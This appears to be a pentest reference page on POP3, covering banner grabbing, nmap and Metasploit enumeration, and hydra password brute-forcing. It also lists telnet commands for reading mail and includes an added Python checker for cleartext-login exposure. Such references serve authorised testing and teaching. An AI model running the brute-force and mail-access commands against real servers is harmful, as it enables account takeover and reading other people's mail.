POP3 110,995

Post Office Protocol (POP) is an Internet standard protocol that a mail client uses to retrieve email from a remote mail server. It is an application layer protocol in the OSI model. Port 110 is the plaintext service and port 995 is POP3 over TLS.

POP clients generally connect, retrieve all messages, store them on the client system, and delete them from the server. There are 3 versions of POP, but POP3 is the most used one.

PORT    STATE SERVICE
110/tcp open  pop3

  • Banner Grab 110

nc -nv {IP} 110

  • Banner Grab 995 (secure, over TLS)

openssl s_client -connect {IP}:995 -crlf -quiet

  • Nmap Scan for POP info

nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 {IP}

  • Brute Force

hydra -l {Username} -P {Big_Passwordlist} -f {IP} pop3 -V

hydra -l <USER> -P <PASSWORDS_LIST> -f <IP> pop3 -V

hydra -S -v -l <USER> -P <PASSWORDS_LIST> -s 995 -f <IP> pop3 -V

  • Read mail

telnet <IP> 110

USER <USER>
PASS <PASSWORD>
LIST
RETR <MAIL_NUMBER>
QUIT

  • POP3 enumeration without the need to open an interactive msfconsole session

Note: sourced from https://github.com/carlospolop/legion

msfconsole -q -x 'use auxiliary/scanner/pop3/pop3_version; set RHOSTS {IP}; set RPORT 110; run; exit'
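
Added example, not part of the original page or of any tool it cites: a way to audit the CAPA reply that the banner grab or the `pop3-capabilities` script returns, flagging a port 110 listener that accepts credentials in cleartext. The function names and both sample replies are constructed for illustration.

```python
# Added example: audit a POP3 CAPA reply (RFC 2449) for cleartext-credential exposure.
# Function names and sample replies are constructed, not taken from the page.

CLEARTEXT_SASL = {"PLAIN", "LOGIN"}  # mechanisms that send the password unprotected


def parse_capa(raw: bytes) -> dict:
    """Parse a multi-line CAPA reply into {CAPABILITY: [args]}.

    Raises ValueError on -ERR or on a reply missing the terminating "." line.
    """
    lines = raw.decode("ascii", errors="replace").split("\r\n")
    if not lines[0].startswith("+OK"):
        raise ValueError(f"server rejected CAPA: {lines[0]!r}")
    caps = {}
    for line in lines[1:]:
        if line == ".":              # end of the multi-line response
            return caps
        if line.startswith("."):     # undo dot-stuffing (RFC 1939, section 3)
            line = line[1:]
        if not line:
            continue
        tag, *args = line.split()
        caps[tag.upper()] = [a.upper() for a in args]
    raise ValueError("truncated reply: no terminating '.' line")


def audit(caps: dict, tls_wrapped: bool) -> list:
    """Return findings; tls_wrapped=True means implicit TLS, as on port 995."""
    if tls_wrapped:
        return []                    # credentials already travel inside TLS
    findings = []
    if "STLS" not in caps:
        findings.append("no STLS: session cannot be upgraded to TLS")
    if "USER" in caps:
        findings.append("USER/PASS offered before TLS")
    weak = CLEARTEXT_SASL & set(caps.get("SASL", []))
    if weak:
        findings.append("cleartext SASL before TLS: " + ",".join(sorted(weak)))
    return findings


# Constructed samples: a legacy listener, and one that only offers STLS before TLS.
LEGACY = b"+OK Capability list follows\r\nTOP\r\nUIDL\r\nUSER\r\nSASL PLAIN LOGIN\r\n.\r\n"
HARDENED = b"+OK\r\nCAPA\r\nTOP\r\nUIDL\r\nRESP-CODES\r\nPIPELINING\r\nSTLS\r\n.\r\n"

if __name__ == "__main__":
    for name, raw in (("legacy", LEGACY), ("hardened", HARDENED)):
        print(name, audit(parse_capa(raw), tls_wrapped=False))
```

An empty findings list on port 110 means the server withholds USER and cleartext SASL until the client has issued STLS.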
